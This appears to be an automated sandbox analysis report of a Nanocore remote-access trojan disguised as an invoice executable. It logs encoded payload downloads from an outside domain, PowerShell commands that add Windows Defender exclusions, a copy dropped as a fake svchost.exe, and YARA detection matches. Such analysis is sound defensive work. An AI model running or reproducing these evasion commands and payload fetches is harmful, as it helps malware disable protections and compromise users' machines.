                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=nINWiXu%2BwXd%2Fbx8d2B9lkv6YSUK9dbz5%2FTyDXZtbIKdI6DIgAakgloFv8oHWvAujXs5Ndt2aT%2FyFA%2BK2Tb3C4tPPqQT7cNaozpOCsU2u6mOnBP51"}],"max_age":604800}
                                                                                                              NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202e01fa7203f-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Raw: 34 63 35 33 0d 0a 3c 70 3e 54 53 4e 4b 53 79 43 54 53 7a 79 53 79 43 54 53 7a 4e 53 79 43 54 53 4c 79 53 79 43 54 53 4c 4b 53 79 43 54 53 79 53 79 79 53 62 79 53 4b 53 62 4c 53 4b 53 62 62 53 4b 53 62 54 53 4b 53 62 73 53 4b 53 4b 53 4c 62 53 4e 51 53 79 51 54 53 79 4b 4e 53 79 51 54 53 79 4c 4c 53 79 51 54 53 79 4c 73 53 79 51 54 53 79 79 54 53 79 51 54 53 79 4b 4e 53 79 51 54 53 51 79 53 79 51 54 53 79 79 79 53 79 51 54 53 79 4c 79 53 79 51 54 53 79 4b 4e 53 79 51 54 53 79 4b 73 53 79 51 54 53 79 4b 7a 53 79 51 54 53 79 53 79 79 53 62 43 53 4b 53 73 4e 53 4b 53 73 51 53 4b 53 62 54 53 4b 53 62 79 53 4b 53 4b 53 79 51 53 4c 73 51 53 62 43 53 4c 73 7a 53 62 43 53 4c 62 4b 53 62 43 53 4c 73 4c 53 62 43 53 4c 73 62 53 62 43 53 79 4e 43 53 62 43 53 79 4e 79 53 62 43 53 79 4e 43 53 62 43 53 79 4e 79 53 62 43 53 79 53 79 79 53 73 51 53 4b 53 62 79 53 4b 53 62 62 53 4b 53 73 4e 53 4b 53 73 51 53 4b 53 4b 53 62 79 53 79 51 53 4c 79 53 73 51 53 4c 79 53 54 73 53 4c 79 53 4c 62 53 4c 79 53 73 62 53 4c 79 53 62 4e 53 4c 79 53 62 43 53 4c 79 53 62 4b 53 4c 79 53 73 51 53 4c 79 53 54 43 53 4c 79 53 54 73 53 4c 79 53 43 4b 53 4c 79 53 73 51 53 4c 79 53 54 43 53 4c 79 53 62 51 53 4c 79 53 54 62 53 4c 79 53 54 4c 53 4c 79 53 73 7a 53 4c 79 53 73 51 53 4c 79 53 43 79 53 4c 79 53 54 73 53 4c 79 53 54 4c 53 4c 79 53 73 51 53 4c 79 53 73 62 53 4c 79 53 62 7a 53
                                                                                                              Data Ascii: 4c53<p>TSNKSyCTSzySyCTSzNSyCTSLySyCTSLKSyCTSySyySbySKSbLSKSbbSKSbTSKSbsSKSKSLbSNQSyQTSyKNSyQTSyLLSyQTSyLsSyQTSyyTSyQTSyKNSyQTSQySyQTSyyySyQTSyLySyQTSyKNSyQTSyKsSyQTSyKzSyQTSySyySbCSKSsNSKSsQSKSbTSKSbySKSKSyQSLsQSbCSLszSbCSLbKSbCSLsLSbCSLsbSbCSyNCSbCSyNySbCSyNCSbCSyNySbCSySyySsQSKSbySKSbbSKSsNSKSsQSKSKSbySyQSLySsQSLySTsSLySLbSLySsbSLySbNSLySbCSLySbKSLySsQSLySTCSLySTsSLySCKSLySsQSLySTCSLySbQSLySTbSLySTLSLySszSLySsQSLySCySLySTsSLySTLSLySsQSLySsbSLySbzS


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                              2192.168.2.449731172.67.172.1780C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                              Feb 25, 2021 15:10:40.880906105 CET8125OUTGET /base/F5B9A7CB87ADE6C09DC3687F02604706.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Connection: Keep-Alive
                                                                                                              Feb 25, 2021 15:10:40.968910933 CET8126INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:40 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d1debf37db94f80ca7bce3e750e3ab5571614262240; expires=Sat, 27-Mar-21 14:10:40 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:15 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b201e9600000b47bc8f1000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MwPbrpXDhEBhwbK7Fy9d%2B9tYP8e8hX0onlKmyOV4AaZpLWks95hE%2BbF96ssBOoRRFCvsUJJic6%2BG%2BPKcKiHp7NmuDMEMYXW0eN2Tb7926Cvi5IGq"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202ddbe020b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Raw: 36 64 35 64 0d 0a 3c 70 3e 7a 7a 53 51 4b 53 79 73 73 53 4b 53 43 53 4b 53 4b 53 4b 53 73 53 4b 53 4b 53 4b 53 4c 62 62 53 4c 62 62 53 4b 53 4b 53 79 4e 73 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 54 73 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 79 4c 4e 53 4b 53 4b 53 4b 53 79 73 53 43 79 53 79 4e 54 53 79 73 53 4b 53 79 4e 4b 53 51 53 4c 4b 62 53 43 43 53 79 4e 73 53 79 53 7a 54 53 4c 4b 62 53 43 43 53 4e 73 53 79 4b 73 53 79 4b 62 53 79 79 62 53 43 4c 53 79 79 4c 53 79 79 73 53 79 79 79 53 79 4b 43 53 79 79 73 53 51 7a 53 79 4b 51 53 43 4c 53 51 51 53 51 7a 53 79 79 4b 53 79 79 4b 53 79 79 79 53 79 79 54 53 43 4c 53 51 4e 53 79 4b 79 53 43 4c 53 79 79 73 53 79 79 7a 53 79 79 4b 53 43 4c 53 79 4b 62 53 79 79 4b 53 43 4c 53 54 4e 53 7a 51 53 4e 43 53 43 4c 53 79 4b 51 53 79 79 79 53 79 4b 4b 53 79 4b 79 53 73 54 53 79 43 53 79 43 53 79 4b 53 43 54 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4e 4b 53 54 51 53 4b 53 4b 53 7a 54 53 79 53 43 53 4b 53 7a 54 53 79 73 4c 53 73 79 53 79 4e 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53 4c 4c 73 53 4b 53 43 73 53 4b 53 79 79 53 79 53 4e 4b 53 4b 53 4b 53 79 4c 73 53 79 4b 53 4b 53 4b 53 54 53 4b 53 4b 53 4b 53 4b 53 4b 53 4b 53
                                                                                                              Data Ascii: 6d5d<p>zzSQKSyssSKSCSKSKSKSsSKSKSKSLbbSLbbSKSKSyNsSKSKSKSKSKSKSKSTsSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSKSyLNSKSKSKSysSCySyNTSysSKSyNKSQSLKbSCCSyNsSySzTSLKbSCCSNsSyKsSyKbSyybSCLSyyLSyysSyyySyKCSyysSQzSyKQSCLSQQSQzSyyKSyyKSyyySyyTSCLSQNSyKySCLSyysSyyzSyyKSCLSyKbSyyKSCLSTNSzQSNCSCLSyKQSyyySyKKSyKySsTSyCSyCSyKSCTSKSKSKSKSKSKSKSNKSTQSKSKSzTSySCSKSzTSysLSsySyNKSKSKSKSKSKSKSKSKSLLsSKSCsSKSyySySNKSKSKSyLsSyKSKSKSTSKSKSKSKSKSKS
                                                                                                              Feb 25, 2021 15:10:41.431864023 CET9210OUTGET /base/7A885C86AF3E7CAEF5D9FC154830C30E.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Feb 25, 2021 15:10:41.502985001 CET9211INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:41 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d8daac7e5cc4bd1a2c1eb452b4bd80fc71614262241; expires=Sat, 27-Mar-21 14:10:41 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:18 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2020bd00000b47eea8e000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=xzufLKqwaALRfH8o918HoyhzuWlwbR3XuNNztF73J4jbX6yNSkfid29l7DPGsxGmMgCu7yk7vzUc8AdY%2BP1pOu%2BN9Y0pz%2FEieQrVdxEDxhobteZc"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 627202e12c6d0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Raw: 33 32 37 34 0d 0a 3c 70 3e 79 53 79 43 73 53 79 62 43 53 7a 62 53 79 79 51 53 79 62 53 54 62 53 79 62 79 53 51 54 53 4e 4e 53 4c 73 51 53 79 62 62 53 79 54 4e 53 73 54 53 43 7a 53 54 4c 53 51 73 53 62 4e 53 79 43 53 73 43 53 54 79 53 4c 4b 4b 53 79 54 7a 53 79 4c 79 53 4c 79 53 7a 4b 53 79 4c 79 53 79 4c 53 54 53 4c 43 54 53 79 4e 53 4e 79 53 4c 73 73 53 79 4e 62 53 4c 43 4b 53 79 4e 79 53 54 73 53 79 43 62 53 79 7a 4e 53 79 43 4b 53 51 4b 53 79 43 54 53 79 7a 43 53 7a 51 53 79 4b 43 53 4c 73 4b 53 4c 62 73 53 4c 79 53 79 43 79 53 51 7a 53 4c 79 79 53 73 62 53 79 79 4c 53 73 73 53 79 51 4c 53 79 4b 43 53 73 51 53 79 54 79 53 79 51 54 53 4c 4b 7a 53 79 4e 79 53 62 51 53 4c 43 4c 53 54 43 53 4c 62 4b 53 4c 79 4c 53 79 51 4c 53 7a 54 53 4c 4c 43 53 79 54 62 53 79 4b 73 53 4c 79 4e 53 79 62 73 53 62 4b 53 51 43 53 79 54 4e 53 79 73 62 53 4c 4b 4e 53 43 51 53 54 73 53 79 4c 79 53 79 62 79 53 51 53 4c 73 43 53 51 4e 53 79 4c 62 53 4c 62 79 53 4e 62 53 7a 43 53 4c 4b 73 53 54 4b 53 4c 53 51 4e 53 7a 4e 53 4c 79 54 53 73 51 53 62 4e 53 4c 79 54 53 4c 4b 73 53 4c 79 62 53 4c 43 4c 53 4b 53 62 51 53 79 43 43 53 4c 4b 53 4c 62 53 4e 4c 53 79 4e 4e 53 4c 79 4c 53 4e 62 53 79 7a 4b 53 62 73 53 54 4e 53 7a 4c 53 79 4b 54 53 7a 4e 53 4c 4b 73 53 4c 51 53 79 4b 62 53 79 4c 4b 53 79 51 51 53 79 4e 79 53 4c 73 51 53 54 51 53 79 79 4c 53 79 43 62 53 4c 4c 43 53 62 7a 53 51
                                                                                                              Data Ascii: 3274<p>ySyCsSybCSzbSyyQSybSTbSybySQTSNNSLsQSybbSyTNSsTSCzSTLSQsSbNSyCSsCSTySLKKSyTzSyLySLySzKSyLySyLSTSLCTSyNSNySLssSyNbSLCKSyNySTsSyCbSyzNSyCKSQKSyCTSyzCSzQSyKCSLsKSLbsSLySyCySQzSLyySsbSyyLSssSyQLSyKCSsQSyTySyQTSLKzSyNySbQSLCLSTCSLbKSLyLSyQLSzTSLLCSyTbSyKsSLyNSybsSbKSQCSyTNSysbSLKNSCQSTsSyLySybySQSLsCSQNSyLbSLbySNbSzCSLKsSTKSLSQNSzNSLyTSsQSbNSLyTSLKsSLybSLCLSKSbQSyCCSLKSLbSNLSyNNSLyLSNbSyzKSbsSTNSzLSyKTSzNSLKsSLQSyKbSyLKSyQQSyNySLsQSTQSyyLSyCbSLLCSbzSQ
                                                                                                              Feb 25, 2021 15:10:53.715553045 CET10317OUTGET /base/88756E9935B1A5EAEE811D9BDFD69574.html HTTP/1.1
                                                                                                              Host: coroloboxorozor.com
                                                                                                              Feb 25, 2021 15:10:53.783530951 CET10318INHTTP/1.1 200 OK
                                                                                                              Date: Thu, 25 Feb 2021 14:10:53 GMT
                                                                                                              Content-Type: text/html
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: keep-alive
                                                                                                              Set-Cookie: __cfduid=d4de44723b8acb5b852a68d7a1c6b68e81614262253; expires=Sat, 27-Mar-21 14:10:53 GMT; path=/; domain=.coroloboxorozor.com; HttpOnly; SameSite=Lax
                                                                                                              Last-Modified: Wed, 24 Feb 2021 19:31:20 GMT
                                                                                                              Vary: Accept-Encoding
                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                              cf-request-id: 087b2050b700000b47aeb3d000000001
                                                                                                              Report-To: {"group":"cf-nel","endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RRpam08yb21ui9neTxb3iQ33jNbBtw8bAbyWjMcY4Lal4h4WZ5WnAzJt1lTGKu1juY69r0PXKBEB7JPYhumOSVGv3wffU6HNIo1lVmcrfHF92vAN"}],"max_age":604800}
                                                                                                              NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 6272032dff3e0b47-AMS
                                                                                                              alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                              Data Raw: 34 63 35 33 0d 0a 3c 70 3e 54 53 4e 4b 53 79 43 54 53 7a 79 53 79 43 54 53 7a 4e 53 79 43 54 53 4c 79 53 79 43 54 53 4c 4b 53 79 43 54 53 79 53 79 79 53 62 79 53 4b 53 62 4c 53 4b 53 62 62 53 4b 53 62 54 53 4b 53 62 73 53 4b 53 4b 53 4c 62 53 4e 51 53 79 51 54 53 79 4b 4e 53 79 51 54 53 79 4c 4c 53 79 51 54 53 79 4c 73 53 79 51 54 53 79 79 54 53 79 51 54 53 79 4b 4e 53 79 51 54 53 51 79 53 79 51 54 53 79 79 79 53 79 51 54 53 79 4c 79 53 79 51 54 53 79 4b 4e 53 79 51 54 53 79 4b 73 53 79 51 54 53 79 4b 7a 53 79 51 54 53 79 53 79 79 53 62 43 53 4b 53 73 4e 53 4b 53 73 51 53 4b 53 62 54 53 4b 53 62 79 53 4b 53 4b 53 79 51 53 4c 73 51 53 62 43 53 4c 73 7a 53 62 43 53 4c 62 4b 53 62 43 53 4c 73 4c 53 62 43 53 4c 73 62 53 62 43 53 79 4e 43 53 62 43 53 79 4e 79 53 62 43 53 79 4e 43 53 62 43 53 79 4e 79 53 62 43 53 79 53 79 79 53 73 51 53 4b 53 62 79 53 4b 53 62 62 53 4b 53 73 4e 53 4b 53 73 51 53 4b 53 4b 53 62 79 53 79 51 53 4c 79 53 73 51 53 4c 79 53 54 73 53 4c 79 53 4c 62 53 4c 79 53 73 62 53 4c 79 53 62 4e 53 4c 79 53 62 43 53 4c 79 53 62 4b 53 4c 79 53 73 51 53 4c 79 53 54 43 53 4c 79 53 54 73 53 4c 79 53 43 4b 53 4c 79 53 73 51 53 4c 79 53 54 43 53 4c 79 53 62 51 53 4c 79 53 54 62 53 4c 79 53 54 4c 53 4c 79 53 73 7a 53 4c 79 53 73 51 53 4c 79 53 43 79 53 4c 79 53 54 73 53 4c 79 53 54 4c 53 4c 79 53 73 51 53 4c 79 53 73 62 53 4c 79 53 62 7a 53 4c 79 53 79 53 51 53 62 43 53
                                                                                                              Data Ascii: 4c53<p>TSNKSyCTSzySyCTSzNSyCTSLySyCTSLKSyCTSySyySbySKSbLSKSbbSKSbTSKSbsSKSKSLbSNQSyQTSyKNSyQTSyLLSyQTSyLsSyQTSyyTSyQTSyKNSyQTSQySyQTSyyySyQTSyLySyQTSyKNSyQTSyKsSyQTSyKzSyQTSySyySbCSKSsNSKSsQSKSbTSKSbySKSKSyQSLsQSbCSLszSbCSLbKSbCSLsLSbCSLsbSbCSyNCSbCSyNySbCSyNCSbCSyNySbCSySyySsQSKSbySKSbbSKSsNSKSsQSKSKSbySyQSLySsQSLySTsSLySLbSLySsbSLySbNSLySbCSLySbKSLySsQSLySTCSLySTsSLySCKSLySsQSLySTCSLySbQSLySTbSLySTLSLySszSLySsQSLySCySLySTsSLySTLSLySsQSLySsbSLySbzSLySySQSbCS


                                                                                                              Code Manipulations

                                                                                                              Statistics

                                                                                                              Behavior

                                                                                                              Click to jump to process

                                                                                                              System Behavior

                                                                                                              Analysis Process: CN-Invoice-XXXXX9808-19011143287994.exe PID: 2016 Parent PID: 6012

                                                                                                              General

                                                                                                              Start time:15:09:56
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe'
                                                                                                              Imagebase:0xbf0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000000.00000002.933305854.0000000004481000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Reputation:low

                                                                                                              Analysis Process: powershell.exe PID: 1472 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Analysis Process: conhost.exe PID: 1444 Parent PID: 1472

                                                                                                              General

                                                                                                              Start time:15:10:08
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: AdvancedRun.exe PID: 5008 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:09
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 3%, Metadefender, Browse
                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: AdvancedRun.exe PID: 4824 Parent PID: 5008

                                                                                                              General

                                                                                                              Start time:15:10:11
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Users\user\AppData\Local\Temp\ad6ba6ad-9e3d-4fc8-98d0-88a6e198c3b3\AdvancedRun.exe' /SpecialRun 4101d8 5008
                                                                                                              Imagebase:0x400000
                                                                                                              File size:91000 bytes
                                                                                                              MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: powershell.exe PID: 3400 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:18
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\CN-Invoice-XXXXX9808-19011143287994.exe' -Force
                                                                                                              Imagebase:0xae0000
                                                                                                              File size:430592 bytes
                                                                                                              MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Reputation:high

                                                                                                              Analysis Process: conhost.exe PID: 4864 Parent PID: 3400

                                                                                                              General

                                                                                                              Start time:15:10:18
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: cmd.exe PID: 5856 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                              Imagebase:0x11d0000
                                                                                                              File size:232960 bytes
                                                                                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: conhost.exe PID: 616 Parent PID: 5856

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              Imagebase:0x7ff724c50000
                                                                                                              File size:625664 bytes
                                                                                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: timeout.exe PID: 816 Parent PID: 5856

                                                                                                              General

                                                                                                              Start time:15:10:19
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:timeout 1
                                                                                                              Imagebase:0x13a0000
                                                                                                              File size:26112 bytes
                                                                                                              MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: explorer.exe PID: 4792 Parent PID: 3424

                                                                                                              General

                                                                                                              Start time:15:10:21
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: explorer.exe PID: 4424 Parent PID: 800

                                                                                                              General

                                                                                                              Start time:15:10:22
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: svchost.exe PID: 4184 Parent PID: 4424

                                                                                                              General

                                                                                                              Start time:15:10:23
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0xa80000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.955915936.000000000458A000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                              • Detection: 28%, ReversingLabs
                                                                                                              Reputation:low

                                                                                                              Analysis Process: CasPol.exe PID: 4228 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:26
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                              Imagebase:0x4f0000
                                                                                                              File size:107624 bytes
                                                                                                              MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.939634194.0000000002AF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.913372093.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
